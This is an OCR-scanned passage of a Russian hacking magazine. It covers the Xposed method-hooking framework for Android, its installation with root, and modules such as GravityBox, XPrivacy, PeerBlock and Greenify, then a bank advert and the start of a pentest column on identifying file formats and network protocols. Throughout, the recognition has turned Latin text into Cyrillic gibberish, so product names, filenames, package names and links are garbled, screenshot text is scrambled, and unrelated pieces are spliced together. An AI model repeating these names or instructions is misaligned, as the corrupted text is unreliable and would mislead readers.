смартфонов. И те и другие следует устанавли- 
вать через консоль восстановления, перед этим 
сделав бэкап предыдущей прошивки и соблюдая 
последовательность, так как, установив одну мо- 
дификацию поверх другой, затрагивающей тотже 
файл, мы потеряем функциональность первой. 

В общем, слишком много хлопот для разра- 
ботчиков и слишком много проблем для пользо- 
вателей. К счастью, существует гораздо более 
дружелюбный способ установки модификаций 
и расширений. 


ПЕРЕХВАТ УПРАВЛЕНИЯ 

Суть способа в следующем. Практически любая 
современная операционная система состоит 
из ядра и большого количества взаимосвязанных 
компонентов. В Мпих это /бооитИтиг и библио- 
теки из каталогов /11 и /изг/Ь; в\АМЛпао\м$ это ядро 
кегпе!32.а! и болышое количество ОШ-библиотек 
из системного каталога; в Апаго это опять же 
ядро Ипих в выделенном разделе и большое ко- 
личество уауа-классов, упакованных в тот самый 
файл /зу$ет/ЛУгатемюогКк/ЯатемогК.аг. 

Практически все компоненты, за исключени- 
ем ядра, могут быть загружены либо во время 
инициализации ОС, либо по мере необходимо- 
сти. Это значит, что компонент можно подменить 
на модифицированный, что, по сути, и проис- 
ходит, когда мы устанавливаем одну из модифи- 
каций Апаго классическим способом: один или 
несколько файлов заменяются и загружаются си- 
стемой при следующем включении. 

Однако, как мы уже выяснили, у такого спосо- 
ба куча проблем, и поэтому лучше использовать 
другой путь, а именно: вклиниться в процесс за- 
грузки файла (а в случае Апагоа это Чауа-класс), 
затем перехватить вызовы его методов и напра- 
вить по другому адресу. Так мы убьем сразу двух 
зайцев: не сломаем систему, поскольку не будем 
изменять системные компоненты вообще, и ре- 
шим проблему с неудобством установки модифи- 
каций, так как сможем направить перехваченные 
вызовы (методы) уауа-класса кому угодно, напри- 
мер обычному непривилегированному приложе- 
нию. Именно так работает Хрозеч. 


ХРОЗЕО РЕВАМЕ\М!ОВК 
Любой класс в Апаго загружается с помощью 
небольшого нативного приложения /зузет/ 


оп/арр_ргосе$$. Его задача — запустить вирту- 
альную машину ПБаМмМК, загрузить необходимые 
для работы системные классы (окружение испол- 
нения) и передать управление классу (на самом 
деле происходит обращение к сервису Гудае, 
который форкает уже готовую ВМ и окружение 
в режиме сору-оп-ммЩе, но в нашем случае это 
неважно). 

Хрозе4 представляет собой модифицирован- 
ную версию арр_ргосез$$, которая при запуске 
первым делом загружает в память специальный 
Чама-класс-перехватчик, а лишь после него — 
оригинальный уауа-класс. Перехватчик выступает 
в качестве посредника для любых вызовов чуауа- 
методов, инициированных оригинальным клас- 
сом, и, в случае необходимости, перенаправляет 
их классу-обработчику. 

Последний как раз и занимается тем, что из- 
меняет поведение системы. Например, для опре- 
деления цвета текста приложения использу- 
ют метод СеСоог класса апагоа.сотетт.ге$. 
Везоигсез. Если класс-обработчик перехватит 
этот метод и вернет вместо кода серого цвета 
код зеленого, все надписи в интерфейсе станут 
зелеными. Модификации могут быть и более 
сложными, например когда они связаны с альтер- 
нативной реализацией сразу нескольких методов 
и целых классов. 

В комплекте Хрозеч готовых классов-обработ- 
чиков нет, но он позволяет любому разработчику 
распространять их в виде обычных АРК-пакетов, 
а пользователю просто установить и активировать 
с помощью специального интерфейса. Другими 
словами, с помощью Хрозе можно устанавли- 
вать и удалять модификации Апаго@ как обычные 
приложения, без необходимости в прошивке, 
копировании в системный каталог и без какого- 
либо риска. 


МОДУЛИ 

В терминологии Хрозе4 классы-обработчики на- 
зываются модулями, и в данный момент их насчи- 
тывается уже более сотни. Причем это не какие- 
то игрушки с изменением цветов из предыдущего 
примера, а серьезные доработки, такие как дви- 
жок тем, глубокие модификации строки состо- 
яния, секьюрити-патчи, блокиратор рекламы, 
менеджер полномочий приложений и многое дру- 
гое. В оставшейся части статьи я расскажу о наи- 
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Г Хро$ед 1п>1аНег система МОДУЛИ 


—_— 
вить Хрозе4 с 
ельной информац 


Установить/Обновить 
Удаление (восстановление арр_ргосе$$) 


Очистка (полное удаление) 


Мягкая перезагрузка Перезагрузка 


Для установки Хро5е4 достаточно нажать однукнопку 


более интересных модификациях, а пока о том, 
как установить Хрозеа. 

Хрозе невозможно найти в маркете, с точ- 
ки зрения Сооде это вредоносное приложение, 
которое может навредить системе. Это, конеч- 
но же, не так, но мы не будем спорить с Соочде, 
а просто скачаем приложение из интернета ( 

‚ файл Хрозеатзайег 2.1.4.арк). После 
установки приложение запросит права гос}, а за- 
тем выведет на экран интерфейс с несколькими 
кнопками. Нажимаем шЗа!/Ура=ме и перезагру- 
жаем смартфон. 

Все установленные пакеты, содержащие мо- 
дули Хрозеа, будут автоматически появляться 
на вкладке Модщез$ приложения. Включить их 
можно, просто поставив галочку напротив, а за- 
тем перезагрузив смартфон. К сожалению, искать 
и скачивать модули придется самостоятельно, так 
как в Сооде Р!ау большинства из них нет, а рабо- 
та по созданию родного репозитория Хрозеа еще 
не завершена. 


МОДИФИКАЦИИ ИНТЕРФЕЙСА 
Наибольшего внимания заслуживают модули, 
которые каким-либо образом изменяют внеш- 
ний вид операционной системы. Таких модулей 
на просторах инета довольно много, и среди них 
есть бриллианты из разряда ти${ Пауе. В этом 
разделе мы поговорим о них. 
Махитге \младез оп 1осКзсгееп \( 

). Простой модуль, который автомати- 
чески разворачивает виджеты на экране блоки- 
ровки при включении смартфона. Очень удобен 
при использовании больших информационных 
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Арр $етад$ позволяет изменить внешний вид и поведение любого приложения 


о база для модулей, которые могут изменить поведение и внешний вид вашего телефона Апдго!. Для 


ИВ хроес тпта|ег Система МОДУЛИ 
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<, А Мазег Кеу диа! Ях [1.3] 
я Реег Воск {ог Апдго!4 [1.03] 
м | В 9.5] 
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АА 


Платная версия 
ХРиуасу с возможно- 
стью импорта и экс- 

порта настроек: 


Большая коллекция 
модулей Хрозеа: 


После активации новых модулей устройство придется перезагружать 


виджетов наподобие Вай оск. В СуаподепМос, 
кстати, есть аналогичная функциональность (На- 
стройки —> Экран блокировки -—› Развернутые 
виджеты). 

АОЗР 1осК$сгееп ( ). Модуль за- 
меняет экран блокировки на стандартный из по- 
ставки Апаго@, без модификаций производителя 
смартфона. Будет полезен тем, кто хочет полу- 
чить |оокК апа Тее! обычного Апагохг, не устанавли- 
вая стороннюю прошивку. 

АррФейта5 ( ль Добавляет 
в любую прошивку функциональность, анало- 
гичную настройкам приложений в прошивке 
РагапоаАпаго. С его помощью можно изменять 
значение ОР! для отдельно взятых приложений, 
отключить показ строки состояния во время их 
работы, отключить гашение экрана или изменить 
язык. С помощью изменения ОР! можно сделать 
так, чтобы приложение работало в планшетном 
режиме на телефоне (ОР! = 160) или в телефон- 
ном на планшете (ОР! > 240). 

ВаЦегу Тпетета ( ). Модуль 
с большим количеством различных стилей ото- 
бражения заряда батареи, от круговых до различ- 
ных символов и изображений. 

ХТЛетеЕпате ( ). Полноценный 
движок тем, практически повторяющий аналогич- 
ный движок в прошивке СуаподепМоа. Позволяет 
полностью изменять внешний вид интерфейса, 
включая иконки, но по техническим причинам не- 
совместим с темами для СуаподепМоч. Встро- 
енного репозитория тем также нет, так что их 
придется искать самостоятельно. Небольшую 
коллекцию можно найти здесь: 


=. АррИсайоп 5етд$ 


Ссгееп (4р): (асфаи) 

оса! (ОегаиН) 
РиЙзсгееп № Те Зсгееп оп 
Зпо\ми мпеп рпопе юскед 

Опетаноп- (ЗеРаий арр гоёаНоп) 


Везет пет МоИсацоп$ 


Реп! 0пз 


напланшетный 


[соп Тпетег ( ). Еще один дви- 
жок тем, в этот раз для замены иконок. Позволя- 
ет использовать комплекты иконок, созданные 
для Моуа Гаипспег, Арех Гаипспеги АБМ/ Гаипспег, 
в любых ланчерах. Сотни различных айконпаков 
можно найти в Сооде Ру. 

Мзаотфку Хрюой ( ). Модуль 
для глубокой кастомизации строки состояния. 
Позволяет изменять цвета, стиль отображения 
часов и батареи и многое другое. 


КОЛЛЕКЦИИ ТВИКОВ 

Кроме модулей узконаправленной функциональ- 

ности, есть и целые коллекции твиков в стиле 

«все в одном». Они позволяют делать множество 

вещей — от изменения цвета часов в строке со- 

стояния до включения различных скрытых функ- 
ций, вроде переворота локскрина в зависимости 
от положения экрана или эффекта выключения 
экрана в стиле старого телевизора (его мож- 
но найти в прошивках устройств серии Мехиз 

и СуаподепМод). 

СгамКуВох ( ) — одна из таких 
коллекций твиков и доработок с акцентом на ря- 
довых пользователей. Наиболее интересные воз- 
можности: 

. Всплывающие наэкранные клавиши нави- 
гации в стиле РЕ из Рагапо!ААпагога. После 
активации наэкранные клавиши управления 
внизу экрана исчезают, а вместо них по- 
являются всплывающие с одной из сторон 
экрана кнопки. Очень удобная тиз${ Вауе 
функциональность (также доступна в при- 
ложении ЕМТ Ёаипспег). 


Достаточно изменить значение ОР[на 160, и интерфейс приложения изменится 
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. Возможность изменения расположения и уда- 
ления кнопок (тайлов) быстрого управления 
питанием в шторке. Также доступно несколько 
дополнительных кнопок, в том числе фонарик 
и быстрое включение точки доступа. 

. Возможность изменения строки состояния, ее 
цвета, цвета текста и стиля отображения бата- 
реи и часов, изменения фонового изображе- 
ния и прозрачности шторки. 

. Расширенное меню выключения с возможно- 
стью перезагрузки в Весо\уегу. 

. Переключение композиций в стандартном 
плеере с помощью долгого нажатия на кнопки 


громкости. 
. Исправление самого известного небага 
Апаго — отображение фото звонящего 


не на весь экран (есть в виде отдельного мо- 
дуля: аоо.аИт ОУН). 

. Эффект выключения экрана в стиле старого 
телевизора. 

. Авторазворот виджетов на локскрине. 

. Включение режима вибро при перевороте 
смартфона экраном вниз. 

. Патч для уязвимости Ма ег Кеу (возмож- 
ность внедрения любых файлов в системный 
АРК-пакет и его установки без предупрежде- 
ний). Есть в виде отдельного модуля (900.9/ 
а4Вет{. 

. Гибкое управление подсветкой кнопок и све- 
тодиодом. 

. Исправление множества багов, присутствую- 
щих в прошивках для МТК6589-устройств (ки- 
тайские смартфоны 2013 года выпуска). 


Еще одна популярная коллекция — это 
МобаСо Тоой (ч00.9/МУЗАЗИ), сборник до- 
вольно специфичных и узконаправленных твиков 


(©) сгауйувох (©) сгауйуВох 


м00$ уе зсгееп 1$ оЯ 
С1еаг а! гесеп! {азК$ 
ЕпаЫез Бипоп {о сеаг а! гесеп! 1азК5 У 
а! опсе т гесеп! аррз Фаюд 


Вацегу п@са'ог уе 
Сисе Бацегу мВ регсегаде 


Г ом БаЦегу магптд 
$Зоипд оту 


Ри|сгееп са|ег рАоо 
Отзр!ауз иИзсгееп саШег рАоо оп 
ипсотила са зсгееп 
Ащо-РМае з1дпа! 1соп$ 

"$1М по! тзецед”" поийсайопз 91заЫед, Ащо- 
5де $1 $101 2 


АХЕ$ - 95Е ОМУ 1: МЕЕОЕО 


Ах бае&Тите зе таз сгазВ 
ЕпаЫе м сазе уоци ехрепепсе сгазВ А 
УИе ассеззтд Оае&Тите 5е 19$ 

(гедимез гебос\) 


Адуапсед Ромег-оЙ тепи 
ЕпаЫез адуапсед ромиег-оН тепи мВ С4 
орпоп {о гебоо! {о гесоуегу 


Ах саНег 10 ог рвопе 

ЕпаЫе м сазе уошг сотас\ 15 пот ГА 
гла!свед уеп гесемтд са! (гединез 

гебоо!) 


\Уоите Кеу сигзог согиго! 
№ пе 

Согиго!$ сигзог изд уоите Кеуз п 1ех1 йе! 5 

Моите Кеуз зКр 1гаск 

кр \гаскК$ оп уо!ите Кеуз 1опд-ргез$ 

\/ПИе зсгееп 1$ оЙ 


У Ах са|ег 10 ог теззадез 


ЕпаЫе т сазе уси ехрепепсе зрицед “ 
сопуегза\оп {Ргеад$ {ог Пе зате 

Сеаг а! гесег! 4азК$ сотцаси (гедииез$ гебос!) 
ЕпаЫе$ БиЦоп {о с1еаг а! гесеп! 1аК$ 
а! опсе т гесеп! аррз 1а109 


“ 


Ах саепдаг арр 
ЕпаЫе т" сазе уси ехрепепсе репос и“ 
зеН-1игпилд оп о! {Пе зсгееп (гедиие$ 


РиЙзсгееп саНег рАоо 
Нем 


Длинные списки твиков модуля СгауНуВох 


СУПА ЗОВЗТВАТЕ 


На перехват! 


З1юсКк БаЦегу пфса{юог 
Сис!е БаЦегу мИН регсегцаде ® 


Гагде регсеп\ 4еж 


и хаков с акцентом на смартфоны НТС от извест- 

ного комьюнити МоВаСо. Возможности: 

. Совместимость с рабочим столом Гасебоок 
Ноте. 

. Маскировка смартфона под устройство с раз- 
решением экрана 720р. Полезно владельцам 
1080р-смартфонов и планшетов, которым 
недоступны некоторые приложения в Сооде 
Рау. 

. Неограниченный угол поворота экрана при на- 
клоне устройства. 

. Различные твики строки состояния. 

. Возможность изменения настроек БийПа.ргор 
на лету (ВОААО, ВААМО, ОЕМСЕ, МОПЕЕ, 
РВОБОСТ). Можно использовать для получе- 
ния доступа к приложениям в Сооде Ру. 

. Работа чипа МЕС даже во время сна устрой- 
ства. Для тех, кто часто пользуется МЕС- 
метками (есть как отдельный модуль: 900.09!/ 
ааЕт!). 

. Множество твиков для НТС Опе: отключе- 
ние предупреждения о завышенном уровне 
громкости (одним модулем доо.9/9Мум/7Т), 
дополнительные опции выключения (пере- 
загрузка, Весоуегу), включение смартфона 
кнопкой громкости, отключение бесполезной 
опции Ка Мосе в Ромег Мепи (долгое нажатие 
кнопки включения), иконка ВтКЕееч на рабо- 
чем столе. 


На самом деле в составе тулкита гораздо 
больше модификаций и твиков, но они настолько 
специфичные и нужны столь малому количеству 
пользователей, что смысла описывать их все 
на страницах журнала я не вижу и вместо это- 
го отправляю читателя на страницу приложения 
на ХОРА ОШеуеюрегз. 


© Отзр!ау {меаК$ 


Миитит Бп9тезз |еуе! 
АШо\из 10 зе пипитиит Бпа лез [еуе!. Аррйез 
{© тапиа! 69 пезз$ зе пд. (гедийез гебос\) 


АщоБтамтез$ [еуе!$ 
АШо\$ 10 зе! атЫеп\и ПОР 1еуе!5 апд 
сотезропд та (СО БаскиаМ уашез 


СВТ зсгееп оЯ еНес{ еуе! 3 
ЕпаЫе$ апитацоп {па зиптща(ез 019 А 
СВТ ой еНес{ мпеп 1иглид оЯ пе 

зсгееп 


их тах 


800 


Впдмтез$ (20 - 255) 
100 


Сапсе! 


СгауНуВох — тюнингавторегулировки яркости и кнопок управления 


питанием 
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ТмеаКБох (чоо.а/ЕО61г) — один из первых мо- 
дулей и коллекций твиков для Хрозеа. Интересен 
тем, что обладает небольшой, но действительно 
необходимой функциональностью. В комплекте: 
разные стили отображения батареи и уровня сиг- 
нала, регулировка уровней критического заряда 
батареи (по дефолту 5 и 15%), запись разговоров, 
отключение функции включения экрана при от- 
соединении от зарядника (есть в СуаподепМод), 
переключение между композициями с помо- 
щью качельки громкости, изменение поведения 
при долгом нажатии на кнопку «Домой», ТВ- 
эффект выключения экрана. 


БЕЗОПАСНОСТЬ 

Кроме упомянутого в предыдущем разделе мо- 
дуля, закрывающего баг Мазег Кеу, для Хрозеа 
доступно еще несколько интересных секьюри- 
ти-модулей. Один из них — это ХРимасу, систе- 
ма принудительного ограничения приложений 
в полномочиях. Второй — РеегВоск, аналог 
одноименного приложения для ПК, предна- 
значенного для блокировки разных рекламных, 
небезопасных и фишинговых сайтов. Далее мы 
подробно рассмотрим функциональность каж- 
догГо ИЗ НИХ. 

Начнем с ХРимасу (доо.аИ/е\/\/4Ма), модуля 
для ограничения приложений в полномочиях, 
который работает в связке с системой безопас- 
ности Апагоа. Его задача — дать пользователю 
контроль над тем, какие именно полномочия (на- 
пример, доступ к интернету, возможность отправ- 
ки 5М$ или запись данных на карту памяти) будут 
разрешены приложению, а какие — нет. По умол- 
чанию Апаго! дает приложению доступ ко всем 
запрошенным им полномочиям, но с помощью 
ХРи\уасу некоторые из них можно отозвать. 


ШМЕО 


Перехватуправле- 
ния не новая идея, 
онареализована 
вИМХ-подобных 
ОС средствами 
предварительной 
загрузки библиотек 
((О_РАЕГОАО) 
иперехвата си- 
стемных вызовов 
спомощью ртасе. 
В\ЛИпаом/$ суще- 
ствуюттехники 
подназванием 
сплайсинги саб- 
классинг, кстати, их 


По своей сути Хрозеа — это Апагоа-аналог популяр- 
ного приложения Суда Зибягае для 0$, создан- 
ного небезызвестным Заиик, автором репозитория 
Суда. Зибзтае используется в джейлбрейкнутых 
-устройствах повсеместно для создания разного рода 
модификаций. Часто фреймворк устанавливается 
в процессе взлома устройства вместе с одноименным 
репозиторием. 

Совсем недавно Заийк выпустил версию Су4!а 
Зибзнае для Апагоа. Фреймворк получился куда более 
продвинутым, чем Хрозед, он создает меньший оверхед 


на систему, позволяет модифицировать как уауа-код, 
так и нативный, с более продвинутым методом пере- 
хвата управления, основанным на внедрении кода 

и функцией защиты от глючных модификаций (достаточ- 
но загрузить смартфон с зажатой кнопкой уменьшения 
громкости для отключения всех модулей). 

Тем не менее за полгода существования Су4!а 
Зибгае для Апаго!а так и не получила распростране- 
ния. Встроенный маркет содержит всего две модифика- 
ции: движок тем М/щегВоага и СуФ!а Васкрой с секьюри- 
ти-патчами. Оба написаны самим Заиик. 


используют многие 
бэкдоры итрояны. 
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а ХРиуасу 


\ 


Отметьте приложения 

к” 10082 АЗбепзе РазЬБовг4 
<? м 10071 АИОго4 

<. © о Апогу Виз 

& к” 10073 АпТиТи ВепсрезаиК 
Я `” 10061 ВеглиИу М9 дез 
№ а. 10075 Саизис 


с д® 10060 Спготе 
®, 


10097 Сгуз\а! 2 СМТ0 Тпете 


ШМЕО 


С а. 
(0) а” 10078 Ого Моне СНеги 
та 10068 горох 
© -Ы 10069 Огорзупс 


у &, ® 10092 бипе2 


На странице Хрозеа 
есть файл Хрозеа- 
Озаег-С\ММ.7р, 
который следует ис- 
пользовать для про- 
шивки через Весоуегу 
в том случае, если 
фреймворк устано- 
вился криво и теперь 
смартфон не загру- 
жается. 


Реегоск ог Апаго4 мн 


Вюсктд 0 1Р5 
Восктд Нозпатез: 0 
СоппесНоп$ МосКед:0 
Воскед ОМ$ Ведиез1$: 0 
АНозу НТТР ТгаЙс 
АПо\у НТТР$ ТгаЙс 
Воск АИ Тгайс (рагапо!4 плоде) 
\ воском$ 
\/ воск "Ач Кеумог4 т {Пе Ноз{ пате 
Газ по${ Москед 


Лаконичный РеегВ оск 


ХРиуасу распространяется в виде обычного 
АРК-пакета (доо.а/Ог/У м), который, помимо мо- 
дуля, также включает в себя графический менелд- 
жер полномочий. Кроме установки АРК-пакета, 
придется прошить через кастомный ВНесоуегу- 
фикс для Хрозеа, необходимый для корректно- 
го ограничения некоторых полномочий (впро- 
чем, модуль работает и без него). Фикс можно 
получить на сайте доо.ит (доо.ит/Чеуз/М66В/ 
хримасу), выбрав подходящий для своей версии 
Апагоа: Хрозеа_Ях_4.0_у2.7р, Хрозеа_Ях_4.1.2р, 
Хрозеа_Ях_4.2.7р или Хрозеа йх_4.3.72р. Работу 
других модулей он не нарушит. 

После установки и активации модуля в Хрозеа 
в меню приложений появится иконка ХРимасу, 
которая открывает приложение для управления 
полномочиями. Главный экран приложения — это 
список всего софта, установленного в системе. 
По отношению к любому из них можно активиро- 
вать систему ограничения, просто поставив галоч- 
ку напротив и выбрав в открывшемся окне раз- 
решенные привилегии. При этом система сама 
даст подсказки на счет безопасности тех или иных 
полномочий, выделив небезопасные жирным 
шрифтом, а наиболее опасные — розовым фоном. 
К первым, кстати, относятся доступ к учетным за- 
писям и 10 устройства, а ко вторым — интернет 
и хранилище данных. Приложения, запрашива- 
ющие небезопасные полномочия и доступ в ин- 
тернет, также будут выделены в основном списке 
приложений с помощью соответствующих иконок. 

Особо отмечу, что там, где это возможно, 
ХРиуасу использует фиктивные данные вместо яв- 
ного возврата кода ошибки приложению. То есть, 
если запретить приложению читать информацию 
о местоположении и владельце смартфона, мо- 
дуль не станет закрывать доступ к этим данным, 


Х-МоБПе 


Приложения, помеченные глобусом, имеют доступв интернет, вос- 
клицательный знак — небезопасные полномочия 


< а ХРиуасу 


2 асвуез ПНегз 


(Г) 10092 бипе2 


СФ 


0.91 


ХАКЕР 10 /177/ 2013 


сот. датезнуз. Чипе? 


Отметьте приложения 


м“ 


(Т) Буфер обмена у“ 


< ® 


\ «© Идентификация устройства м“ 


м“ «Ф Интернет 


“ 


<, ©. 
м а, (0 
«© 


м «® Хранилище (медиа, карта памяти) 


Сеть (адреса) 


Телефон (1, номера, журнал вызовов 


манды эНей (вкл. суперпользователя) 


кк 


а (Г) система (установленные приложения) 


“ а © 


< Анализ приложений 


Работают в фоновом режиме 


Огорзупс 
7/7 МБ (05:45) 


=> ПИТ 
6.9 МБ (05:45) 


Просмотр (браузер) 


< 


Однопользовательской игре доступ в интернетненужен! 


Зуз1ет МопНог - базовая версия (БаНегуЗегмсе) 


4,9 МБ (05:43) 


Запланированный запуск (с момента последней загрузки) 


ВеащИи!МИ9 де 
= 


запусков (включая 1 пробуждений) 


Могут замедлять устройство при... 


ВеащИиМ/аде!$ 


Разблок 


к 


р 
Вкл, 

& {ее у 
Изменение сетевых подключений 


Роске! 


Изменение сетевых подключений 


СВготе 
Включение питания 
Отключение питания 


ти 


СгеепМуи список бодрствующих приложений 


а вернет фиктивное местоположение и рандомно 
сгенерированную инфу о юзере. Эта особенность 
выгодно отличает ХРиуасу от других подобных ре- 
шений, так как очень редко приводит к падению 
приложений из-за отозванных привилегий. 

Второй модуль, РеегВосКк (\м/мим.реег Боск. 
сот) — это альтернативная реализация одно- 
именного приложения для \\Мпао\м/$. Вся его 
работа заключается в том, чтобы блокировать 
доступ операционной системы и приложений 
к определенным интернет-адресам на основе 
правил и списков. По сути, это аналог АЧЬоск+, 
но с возможностью гибкого управления, а самое 
главное, работающий на более низком уровне 
ОС (а не в виде прокси, который сам общается 
с сервером и затем отдает данные системе). 

В настоящее время РеегВюоск использует 
два метода определения блокируемых хостов: 
по наличию Аа в адресе хоста и на основе спи- 
сков адресов, находящихся в каталоге /зАсага/ 
РеегВюску${5/ в обычных текстовых файлах. 
Первый активирован по умолчанию; чтобы акти- 
вировать второй, придется скачать список хостов 
с какого-либо ресурса, например млм. БоскИ$1. 
сот. Далее файл достаточно положить в указан- 
ный каталог, запустить приложение РеегВоск Тог 
Апаго4 и на вкладке Воск 1${5 нажать кнопку 
Вебина саспе БоскИ$. 


СВЕЕМ!РУ 

Еще один очень интересный Хрозед-модуль — 
это СОгеепйу (чо0о.а/НАЕ11), система, которая 
превращает смартфон в выборочное однозадач- 
ное устройство. Это означает, что после его уста- 
новки у тебя появится возможность «заморозить» 
любое приложение, так что ты сможешь продол- 
жать им пользоваться, но оно не будет работать 


в фоне. К примеру, у тебя установлен твиттер- 
клиент, который каждый час просыпается и начи- 
нает обновлять ленту, просыпается днем, ночью, 
в любое время года. И каждый раз, когда он про- 
сыпается, процессор переводится в менее энер- 
гоэффективный режим, а драйвер \ММ-Н выходит 
из спячки, из-за чего драгоценный заряд батареи 
постепенно утекает в никуда. 

Стееп№у позволяет полностью отключить 
любую фоновую активность любого приложе- 
ния, при этом оставив его полностью работо- 
способным, так что ленту можно будет обновить 
самостоятельно, когда нужно. По сути, это мяг- 
кий аналог таск-киллера, за тем исключением, 
что он не убивает приложение (с точки зрения 
энергопотребления это еще хуже, чем фоновая 
работа), а просто запрещает ему выполнять фо- 
новые операции. 

Стееп№у почти полностью автоматизирован, 
поэтому все, что нужно сделать, — это запустить 
его, нажать кнопку + и выбрать из списка наибо- 
лее активные приложения. Система сама рас- 
сортирует приложения по количеству просыпа- 
ний, укажет, для чего они просыпаются и когда 
запланировано следующее бодрствование. Все 
это на русском, так что разобраться будет просто. 
Единственное, я бы не рекомендовал заморажи- 
вать системные приложения и виджеты. 


ВЫВОДЫ 

ХрозеЯ — невероятно удобная и эффективная 
система модификации Апагоа, которую можно 
смело вносить в список тиз${ Пауе приложений 
для всех год{-юзеров. Описанные в статье моду- 
ли лишь малая часть из того огромного количе- 
ства модификаций, которые можно найти в ин- 
тернете. = 


ес Ге) ранах и 
‘твоего. — 


д 
(] 


твовать в акциях и посещать закр 
оприятия для держателей «Мужско, 


авлять своими счетами, используя сис 
ернет- -банка «Альфа- -Клик» _ т 


"Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях, 
ОАО «Альфа-Банка», а также заказав по телефонам: г. Г. — -. 


р 
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У\УАВММС 


Вся информация предоставлена исключительно в ознакомитель- 
ных целях. Ни редакция, ни автор не несут ответственности за лю- 
бой возможный вред, причиненный материалами данной статьи. 


ОПРЕДЕЛИТЬ ТИП ФАЙЛА 


РЕШЕНИЕ 
При пентесте различных систем часто возникает потребность понять, 
с каким типом данных мы имеем дело. Например, есть файл, который об- 
рабатывается исследуемой программой, и необходимо узнать, в каком 
он формате. Или общается клиент с сервером, и «видно», что передается 
какой-то файл, а структура и тип его неясны. И ведь пока достаточно точно 
не поймешь, с чем ты имеешь дело, дальнейшая работа будет просто не- 
эффективна. 

Конечно, задача эта всплывает не так часто. Во многих случаях у нас есть 
возможность посмотреть расширение файла и понять что да как. Или по- 
смотреть первые байты, которые часто указывают на формат. Ну и конечно, 


м 
Не уреГО 0.2.4 зи ие Хх” 
Ре Нар 
# Маесп Ефепяюоп Туре Рот 
1 100.0 % МРС/МРЕС — МРЕСб \М4ео 3000 
н 
| тосе ! 
у | ей | О:\батез\Впагу бота \поме \одо_гуи_5вдо.584 [= 
ТИОЫЬ: у1.02 | Рейпйюопз: 4840 С Апаузе 


Определяем формат файла 


РУО 
Все описанные програм- 
мы с0 всей рубрики ищи 
на диске. 
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У 


Алексей «Сгееп)од» Тюрин, 
ОгоНа! $есигНу 


{ми тег. сот/апуит 


обратиться к документации. Но все же это не всегда возможно. Разработ- 
чики, особенно хоть сколько-то специализированного софта, очень любят 
«извращения». 

Приведу пример. Была как-то работка. Вроде бы все просто: приложе- 
ние «клиент-сервер» и общение по НТТР-протоколу. Что тут может быть 
проблемного? Да вот когда мы установили свой прокси между клиентом 
и сервером, то в Вигр’е мы смогли увидеть только НТТР-заголовки, а тело 
запросов оказалось «кракозяберное». После исследования оказалось, 
что тело просто заархивировано 7!р’ом и при этом отрезан 7р-заголовок. 

Другой пример, который как-то встречали (хотя он немного из другой 
темы). Строка, в которой хранились «интересные» данные, была страннова- 
той: визуально похожа на Ва5еб4, но только текст нельзя было декодировать 
по Вазеб4. После реверса ПО оказалось, что там использовалась модифи- 
цированная версия Ва5еб4. Алгоритм тот же, но подставляемые символы 
другие. В любом случае форматов файлов много, и не всегда удается опре- 
делить их с первого взгляда. 

В качестве одного из быстрых решений можно воспользоваться про- 
граммами-идентификаторами. В них есть набор паттернов для различных 
форматов файлов, и на основе него они могут указать, что за экземпляр, или 
подсказать, в какую сторону копать, если совпадение не точное. 

Такие тулзы достаточно просто находятся в Сети. Одна изних — Ейетуре 0 
(аоо.аИхозК/4). Очень быстро и удобно. Написана она на РУПоп + С\. Пере- 
тащил в окошко файл и видишь статистику, «на что он похож». 

Еще, возможно, будет интересен ресурс от Марко Понтелло (Магсо 
Роще!о) (чоо.9!/УУАЕ5!). Здесь расположена достаточно большая база 
по различным форматам файлов и их паттернов (в общем-то, ЕИауреШ0 
на ней и основывается). 
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ОПРЕДЕЛИТЬ ПРОТОКОЛ ПО СЕТЕВОМУ ТРАФИКУ 


Га 
59 $РЮ Аюогнт Ргоо-о#-Сопсер! 0.4.6 ео» "(8) 
Ре Тооб Нар 
Саззйед беззюпз (200 #г={ Фэрауед) Ргофюсо! Моде! 
Сет Р  С.Рой Зегуег |Р $. Рой Зай те ОБзегу...  Ргоюсо! | Ргоюсо!| — Зеззюпз ОБзегу... 
192.168.... ТСР 57... 173.194.65.120 ТСР 443 1377424394.0.. 12 $$ | ВйТотетё 36 294 
192.168... ТСР 57... 208.78.246.67 ТСРЗ0 — 1377424394.0.. 11 НТТР | 0№5 41 154 
192.168.... ТСР 57... 192.168.1.1 ТСР 1024 13774244028... 3 НТТР | | ебопкеу 34 333 
192.168... ТСР 57... 192.168.1.1 ТСР 1024 1377424402.3.. 3 НТТР | | еОопкеу... 2646 27440 
192.168.... ТСР 57... 198.101.228.83 ТСР 80 13774244004... 2 НТТР еОопКеу... 2794 8491 
192.168.... ТСР 57... 93.184.220.42 ТСРЗ0 — 1377424399.5.. 6 НТТР РР 73 885 
192.168.... ТСР 57.. 198.101.228.83 ТСРЗ0 — 1377424399.9.. 2 НТТР НТТР 121 812 
. 93.184.220.442 1377424399.8.. 9 | | МАР 13 113 

192.168... ЦОР 53... 8.8.4.4 10Р53 — 1377424399.7.. 2 0№ 5 || ВС 32 308 

| 192.168... ТСР 57... 173.194.47.160 ТСР 80 1377424399.2... 4 НТТР 15АКМР 22 175 
192.168.... ТСР 57... 208.78.246.67 ТСРЗ0 — 1377424399.0.. 2 НТТР М5Е 2113 24208 
192.168... ЦОР 63... 8.8.4.4 10Р53  1377424399.5.. 2 0№ 5 | | ММ 23 227 
192.168.... ТСР 57... 208.78.246.67 ТСР 80 1377424398.5... 6 НТТР РОР 26 262 
192.168... ТСР 57... 208.78.246.67 ТСРЗ0 — 1377424398.5.. 6 НТТР | ЭкуреТСР 683 6662 
192.168.... ТСР 57... 208.78.246.67 ТСР 80 1377424398.5... 6 НТТР | | ЭКуре(... 4617 19920 
192.168... ТСР 57... 31.13.72.65 ТСРЗ0 — 1377424399.0.. 8 НТТР | | $МТР 27 296 
192.168... ТСР 57.. 208.78.246.67 ТСРЗ0 — 1377424398.5... 4 НТТР | ЭрошуР2Р 3294 51378 
192.168.... ЦОР 60... 8.8.4.4 УОР 53 1377424399.1... 2 0№ | Зровуб... 50 675 
192.168... ЦОР 55... 8.8.4.4 10Р53 — 1377424399.0... 2 0№5 | | $5Н 54 577 
192.168.... ЦОР 50... 8.8.4.4 ОР 53 1377424394.0... 2 0№ 5 $91 81 734 

| Ргофосо! Моде! Оуегоепсе (8,9) — МаюН Регсетаде > 
М$М 28207 03.19%; = 
РОР 2.7396 03.77%, 
ЭкуреТСР 2.9037 02.68%; 
Экуре ОР 3.5371 00.72%, * 
$МТР 2.7455 03.72%, — 
